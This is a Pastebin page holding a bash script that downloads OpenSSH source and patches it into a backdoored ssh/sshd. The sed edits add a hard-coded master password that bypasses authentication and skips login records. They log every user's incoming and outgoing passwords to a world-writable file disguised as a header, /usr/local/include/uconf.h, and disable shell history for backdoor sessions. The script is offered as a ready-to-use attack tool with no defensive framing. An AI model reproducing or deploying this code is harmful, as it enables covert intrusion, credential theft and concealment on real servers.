API tools faq
paste
View difference between Paste ID: sMCkgf05 and SD0rpvH7
SHOW: | | - or go back to the newest paste.
1
#!/bin/bash
2
PASSWORD=$1
3
SNIFFILE=$2
4
5
BACKDOOR_INC="patch.h"

6
FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h"

7
HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/"

8
OK="done"

9
FAIL="fail"

10
11
echo "ENJOY..."

12
if [ -z $PASSWORD ]; then

13
        echo -n ">>> password: "

14
        read PASSWORD|md5sum

15
fi

16
17
if [ -z $SNIFFILE ]; then

18
echo -n ">>> logfile path: /usr/local/include/uconf.h"

19
SNIFFILE="/usr/local/include/uconf.h"

20
touch "/usr/local/include/uconf.h"

21
chmod o+wr "/usr/local/include/uconf.h"

22
echo "Do not remove /usr/local/include/uconf.h"

23
fi

24
25
echo -n "checking for sshd_config...    "

26
SSHDCONFIG="/etc/ssh"

27
if [ -f $SSHDCONFIG/sshd_config ]; then

28
        echo "$OK  ($SSHDCONFIG)"

29
fi

30
31
if [ -z "$SSHDCONFIG" ]; then

32
        echo "$FAIL"

33
        echo -n ">>> sshd_config path: "

34
        read SSHDCONFIG

35
fi

36
37
# ssh

38
echo -n "checking for OpenSSH binary... "

39
SSH=$(which ssh)

40
if [ -z "$SSH" ]; then

41
        echo "$FAIL"

42
        exit

43
fi

44
echo "$OK  ($SSH)"

45
46
# wget

47
echo -n "checking for wget/curl binary... "

48
WGET=$(which curl)

49
WGET_FLAG="-O"

50
if [ -z "$WGET" ]; then

51
        WGET=$(which wget)

52
        if [ -z "$WGET" ]; then

53
                echo "$FAIL"

54
                exit

55
        else

56
                WGET_FLAG="-qc"

57
        fi

58
fi

59
echo "   $OK  ($WGET)"

60
61
# check ssh version

62
echo -n "checking OpenSSH version... "

63
SSH_VERSION=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/')

64
SSH_DISTRO=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/'|awk '{print $2}')

65
SSH_SHORT_VERSION=$(echo $SSH_VERSION | sed -e's/OpenSSH_\(.*\)/\1/' -e 's/\ .*//')

66
if [ -z "$SSH_SHORT_VERSION" ] || [ -z "$SSH_VERSION" ]; then

67
        echo $FAIL;

68
        exit

69
fi

70
echo "   $OK  ($SSH_VERSION)"

71
72
73
# get ssh

74
OPENSSH=$(echo openssh-$SSH_SHORT_VERSION)

75
echo "downloading source..."

76
$WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz &&

77
#echo "          $OK" &&

78
echo -n "extracting tarball..." &&

79
tar xzf $OPENSSH.tar.gz &&

80
echo "          $OK" &&

81
cd $OPENSSH

82
83
84
# check file sanity

85
echo -n "checking file sanity..."

86
for FILE in $FILES; do

87
        if [ ! -f $FILE ];then

88
                printf "$FILE not found.\n"

89
                exit

90
        fi

91
        cp $FILE $FILE.bak

92
done

93
echo "        $OK"

94
95
echo "generating patches..."

96
BACKDOOR_BUF=\

97
"#ifndef __HAVE_PATCH_H

98
#define __HAVE_PATCH_H

99
#define PATCHPASS \"$PASSWORD\"

100
#define SNFLOG \"$SNIFFILE\"

101
int patch_on;

102
#endif"

103
printf "$BACKDOOR_BUF" > $BACKDOOR_INC

104
105
106
# patch files

107
echo "  patching auth.c...           $OK"

108
sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp

109
echo "  patching loginrec.c...       $OK"

110
sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp

111
echo "  patching auth-passwd.c...    $OK"

112
sed -e '/options.permit_empty_passwd/{n; s/.*/&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/.*/\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/.*/\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp

113
echo " patching session.c...             $OK"

114
sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp

115
echo "  patching sshconnect1.c...    $OK"

116
sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/.*/packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp

117
echo "  patching sshconnect2.c...    $OK"

118
LINENUMBER=$(cat sshconnect2.c|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'|awk -F ":" '{print $1}'|head -3|tail -1)

119
sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp

120
echo "  patching includes.h...    $OK"

121
sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp

122
123
124
# move files

125
for FILE in $FILES; do

126
        mv $FILE.tmp $FILE

127
done

128
echo "done."

129
echo "building source..."

130
131
echo

132
echo Variables:

133
echo " \$SSH_VERSION  =  $SSH_VERSION"

134
echo " \$SSHDCONFIG   = $SSHDCONFIG"

135
echo " \$PASSWORD     = $PASSWORD"

136
137
SSH_PORTABLE=$(cat version.h|grep PORTABLE|head -1|awk -F '"' '{print $2}')

138
if [ -z $SSH_DISTRO ]; then

139
echo "Keeping current version.h"

140
else

141
echo "SSH Distro: $SSH_DISTRO"

142
sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp

143
rm -rf version.h

144
mv version.h.tmp version.h

145
fi

146
147
# start build

148
cat /etc/ssh/sshd_config|grep -i usepam

149
echo 'Configure using PAM (leave blank if yes): '

150
read USEPAM

151
cat /etc/ssh/sshd_config|grep -i GSSAPICleanupCredentials

152
echo 'Configure using kerb5 (leave blank if yes): '

153
read KERB

154
if [ -z $USEPAM ];then

155
echo "Configuring --with-pam"

156
OPT_PAM="--with-pam"

157
else

158
echo "Configuring without PAM"

159
OPT_PAM=""

160
fi

161
if [ -z $KERB ]; then

162
echo "Configuring --with-kerberos5"

163
OPT_KERB="--with-kerberos5"

164
else

165
echo "Configuring without kerb5"

166
OPT_KERB=""

167
fi

168
echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB"

169
./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd

170
171
printf "patched OpenSSH ready.\n"
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!